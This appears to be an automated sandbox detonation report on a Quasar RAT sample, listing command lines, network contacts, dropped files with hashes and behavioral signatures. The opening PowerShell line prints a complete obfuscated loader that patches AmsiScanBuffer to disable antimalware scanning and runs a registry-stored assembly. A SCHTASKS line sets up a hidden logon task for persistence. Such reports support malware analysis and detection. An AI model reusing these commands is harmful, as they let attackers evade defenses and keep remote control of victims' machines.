C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FveygWzWfzez{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$RgHMHfomuIygpT,[Parameter(Position=1)][Type]$reztmTlFgm)$PCRfYmpIEQB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'ed'+'D'+''+[Char](101)+'l'+[Char](101)+'ga'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'M'+'e'+''+[Char](109)+'o'+'r'+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'l'+'e'+'g'+[Char](97)+'teT'+[Char](121)+''+'p'+'e','Cl'+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c,S'+'e'+'a'+[Char](108)+''+'e'+''+'d'+''+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+','+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$PCRfYmpIEQB.DefineConstructor('RTS'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+'l'+'N'+'a'+'m'+''+[Char](101)+',H'+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$RgHMHfomuIygpT).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+'m'+''+'e'+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$PCRfYmpIEQB.DefineMethod('In'+'v'+''+[Char](111)+'k'+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+'l'+'i'+'c'+''+','+''+[Char](72)+'id'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+'g'+''+','+'Ne'+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+',Vi'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l',$reztmTlFgm,$RgHMHfomuIygpT).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+[Char](77)+'an'+[Char](97)+''+'g'+''+[Char](101)+'d');Write-Output $PCRfYmpIEQB.CreateType();}$mLEOSOvHxyzZT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+[Char](116)+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('Mi'+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+'.'+''+'U'+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+'i'+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$XSODmByomeFYhI=$mLEOSOvHxyzZT.GetMethod('Ge'+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+''+'d'+''+[Char](114)+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+'l'+'ic'+','+''+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JlGxeElggKGGKDqObkC=FveygWzWfzez @([String])([IntPtr]);$FTxdBemZQCPbOlMLVcPtpl=FveygWzWfzez @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GZpHqajJJKr=$mLEOSOvHxyzZT.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+'d'+'u'+''+'l'+''+'e'+'H'+'a'+''+'n'+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$oLaaaTtPeZmmxW=$XSODmByomeFYhI.Invoke($Null,@([Object]$GZpHqajJJKr,[Object]('L'+'o'+'a'+'d'+''+'L'+''+'i'+''+'b'+''+[Char](114)+'a'+'r'+''+'y'+''+[Char](65)+'')));$DMBmYJdimSNRoymQi=$XSODmByomeFYhI.Invoke($Null,@([Object]$GZpHqajJJKr,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$RZPumCE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oLaaaTtPeZmmxW,$JlGxeElggKGGKDqObkC).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+[Char](100)+'ll');$MDAhfOyPFUPYWlZEr=$XSODmByomeFYhI.Invoke($Null,@([Object]$RZPumCE,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'Sc'+'a'+''+[Char](110)+''+'B'+''+[Char](117)+''+'f'+'f'+[Char](101)+''+[Char](114)+'')));$puXAHIgegY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DMBmYJdimSNRoymQi,$FTxdBemZQCPbOlMLVcPtpl).Invoke($MDAhfOyPFUPYWlZEr,[uint32]8,4,[ref]$puXAHIgegY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MDAhfOyPFUPYWlZEr,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DMBmYJdimSNRoymQi,$FTxdBemZQCPbOlMLVcPtpl).Invoke($MDAhfOyPFUPYWlZEr,[uint32]8,0x20,[ref]$puXAHIgegY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+'s'+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
C:\Users\Admin\AppData\Local\Temp\New.exe
"C:\Users\Admin\AppData\Local\Temp\New.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{62580871-809d-4acd-8bc6-8c7116bf403e}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| DE | 193.161.193.99:25501 | runderscore00-25501.portmap.host | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
Files
memory/4964-0-0x0000000074FBE000-0x0000000074FBF000-memory.dmp
memory/4964-1-0x0000000005390000-0x00000000053C6000-memory.dmp
memory/4964-3-0x0000000074FB0000-0x0000000075761000-memory.dmp
memory/4964-2-0x0000000005AA0000-0x00000000060CA000-memory.dmp
memory/4964-4-0x0000000074FB0000-0x0000000075761000-memory.dmp
memory/4964-5-0x00000000059C0000-0x00000000059E2000-memory.dmp
memory/4964-7-0x0000000006230000-0x0000000006296000-memory.dmp
memory/4964-6-0x00000000061C0000-0x0000000006226000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ywvylc5f.rld.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4964-16-0x00000000062A0000-0x00000000065F7000-memory.dmp
memory/4964-17-0x0000000006740000-0x000000000675E000-memory.dmp
memory/4964-18-0x0000000006790000-0x00000000067DC000-memory.dmp
memory/4964-20-0x0000000006D30000-0x0000000006D4A000-memory.dmp
memory/4964-19-0x0000000008F90000-0x000000000960A000-memory.dmp
memory/4964-21-0x0000000006CA0000-0x0000000006CA8000-memory.dmp
memory/4964-22-0x00000000089D0000-0x0000000008AC2000-memory.dmp
memory/4964-23-0x000000000ABC0000-0x000000000B166000-memory.dmp
memory/2404-25-0x0000000074FB0000-0x0000000075761000-memory.dmp
memory/2404-34-0x0000000074FB0000-0x0000000075761000-memory.dmp
memory/2404-35-0x0000000074FB0000-0x0000000075761000-memory.dmp
memory/2404-47-0x0000000007A20000-0x0000000007A3E000-memory.dmp
memory/2404-48-0x0000000007A90000-0x0000000007B34000-memory.dmp
memory/2404-46-0x0000000074FB0000-0x0000000075761000-memory.dmp
memory/2404-37-0x00000000711A0000-0x00000000711EC000-memory.dmp
memory/2404-36-0x0000000007A40000-0x0000000007A74000-memory.dmp
memory/2404-49-0x0000000074FB0000-0x0000000075761000-memory.dmp
memory/2404-50-0x0000000074FB0000-0x0000000075761000-memory.dmp
memory/2404-51-0x0000000007C50000-0x0000000007C5A000-memory.dmp
memory/2404-52-0x0000000007E60000-0x0000000007EF6000-memory.dmp
memory/2404-53-0x0000000007DF0000-0x0000000007E01000-memory.dmp
memory/2404-54-0x0000000074FB0000-0x0000000075761000-memory.dmp
memory/2404-57-0x0000000074FB0000-0x0000000075761000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bc6a86437194bfa626eae49dc94bba2d |
| SHA1 | 3a80cfe1754955ec899c013f5fdc068e193b6962 |
| SHA256 | 284d9cfa3d1ac402c04cbc046c7dc2fef7ef5dc9d739c3806d2f256e4dbf9b0e |
| SHA512 | de79790fbf1cce40b0a9b2890024986c9a3dd90c155103296db51dfea1d18ddf868b42f6fd8ba0eabefcb3945c8a2ee8a80ee2cbe07a69f99d40b0838afb4ce3 |
C:\Users\Admin\AppData\Roaming\startup_str_301.vbs
| MD5 | deec8143631052743e93d5e0a2741c54 |
| SHA1 | 43369d421e49028bddce2620e2637c2daecc7382 |
| SHA256 | 1203d2de4d471291c63409f01835f74dfaa320486d9f9705e6d68c28abc4b853 |
| SHA512 | 78642c0dfb1c5258405c86263975ebe9f6edee744b58c6ee3b1a91b27163c451cc69492beddcdc169a377716a140d31eb0b7fe38665b4a376948c956c5939552 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 8ba8fc1034d449222856ea8fa2531e28 |
| SHA1 | 7570fe1788e57484c5138b6cead052fbc3366f3e |
| SHA256 | 2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2 |
| SHA512 | 7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b |
C:\Users\Admin\AppData\Roaming\startup_str_301.bat
| MD5 | f6d5bfaee8a55ff72c7b453fda066d62 |
| SHA1 | 7d737d53013990e5d05076b7206e43eb4793fc7f |
| SHA256 | 3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308 |
| SHA512 | e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284 |
memory/3448-80-0x0000000008F80000-0x0000000009012000-memory.dmp
memory/3448-79-0x0000000008E60000-0x0000000008ECC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Install.exe
| MD5 | b51552b77057c2405f73bbbf9c89234a |
| SHA1 | 4793adbba023f90d2d2ad0ec55199c56de815224 |
| SHA256 | 720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0 |
| SHA512 | 564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66 |
memory/2888-98-0x0000000000900000-0x000000000096C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\New.exe
| MD5 | cf570b21f42f0ce411b7c9961068931e |
| SHA1 | f92aa688a1dbd64a4585ecfe80a9c2d7f408c57d |
| SHA256 | d0c4045c70a0822806a4e56d7883821cd2c19362f1cfed3bcbdb1e1b8eb15234 |
| SHA512 | de9dce8300656cd8531569011d043373193cbda125b738e66a5bf107178b48781d6dc88eea696b2074c352a1bf56a4693cfae62e668993ac24ce18aebfdcd684 |
memory/4964-99-0x0000000074FB0000-0x0000000075761000-memory.dmp
memory/3448-100-0x0000000009130000-0x0000000009142000-memory.dmp
memory/1916-109-0x000001DE6AB90000-0x000001DE6ABB2000-memory.dmp
memory/3448-110-0x000000000AA70000-0x000000000AAAC000-memory.dmp
memory/3448-112-0x000000000AB90000-0x000000000AB9A000-memory.dmp
memory/1916-114-0x000001DE6AF40000-0x000001DE6AF6A000-memory.dmp
memory/1916-115-0x00007FFDDED00000-0x00007FFDDEF09000-memory.dmp
memory/1916-116-0x00007FFDDD7D0000-0x00007FFDDD88D000-memory.dmp
memory/1864-120-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1864-122-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1864-125-0x00007FFDDD7D0000-0x00007FFDDD88D000-memory.dmp
memory/1864-124-0x00007FFDDED00000-0x00007FFDDEF09000-memory.dmp
memory/1864-119-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1864-118-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1864-117-0x0000000140000000-0x0000000140008000-memory.dmp
memory/640-136-0x000001D693720000-0x000001D69374A000-memory.dmp
memory/640-137-0x00007FFD9ED90000-0x00007FFD9EDA0000-memory.dmp
memory/700-147-0x00007FFD9ED90000-0x00007FFD9EDA0000-memory.dmp
memory/560-167-0x00007FFD9ED90000-0x00007FFD9EDA0000-memory.dmp
memory/900-177-0x00007FFD9ED90000-0x00007FFD9EDA0000-memory.dmp
memory/900-176-0x000002391B290000-0x000002391B2BA000-memory.dmp
memory/900-171-0x000002391B290000-0x000002391B2BA000-memory.dmp
memory/560-166-0x00000223EE4F0000-0x00000223EE51A000-memory.dmp
memory/560-161-0x00000223EE4F0000-0x00000223EE51A000-memory.dmp
memory/1000-157-0x00007FFD9ED90000-0x00007FFD9EDA0000-memory.dmp
memory/1000-156-0x000002D71A940000-0x000002D71A96A000-memory.dmp
memory/1000-151-0x000002D71A940000-0x000002D71A96A000-memory.dmp
memory/700-146-0x000002ADE4590000-0x000002ADE45BA000-memory.dmp
memory/700-141-0x000002ADE4590000-0x000002ADE45BA000-memory.dmp
memory/640-131-0x000001D693720000-0x000001D69374A000-memory.dmp
memory/640-130-0x000001D693720000-0x000001D69374A000-memory.dmp
memory/640-129-0x000001D6936F0000-0x000001D693715000-memory.dmp
memory/1864-126-0x0000000140000000-0x0000000140008000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
| MD5 | fa88c90dca47790f22143feecb47d5fe |
| SHA1 | 437589b0cb20e84ceb460329cd727a509ee7304b |
| SHA256 | 74ebd2a533693d0719c2f0ae5f36c4396a7b19df67ffd9071f2aab40caf71978 |
| SHA512 | c9cd52917725ac46186fbda8c488cebb3439ca3540097d58a6f4aeacbba379bf1fa005407e08b69d4476ca6e3172c75e5de6b2fa091c7eaa4c8a06b149f470ea |
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
| MD5 | ed913da46cb8ccd4a57796c6aaec488d |
| SHA1 | 2800a7f724826345bb6c7c00b2640421b676005d |
| SHA256 | 4a5f559ce00f8fb6817734b15dd5d8998972770e5889f08673e118674301a40c |
| SHA512 | b00673889a78f09d9c8717e3ff34f4865510ba65adb916ab03725a4e2246c75adc8dc04441f30c42d34db6d2b777e5939b6b8f5a16f7f4f84d47c1ce62f4038c |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-28 13:42
Reported
2024-05-28 13:47
Platform
win10-20240404-en
Max time kernel
300s
Max time network
298s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 212 created 584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | c:\windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 212 set thread context of 2496 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 28 May 2024 13:43:52 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
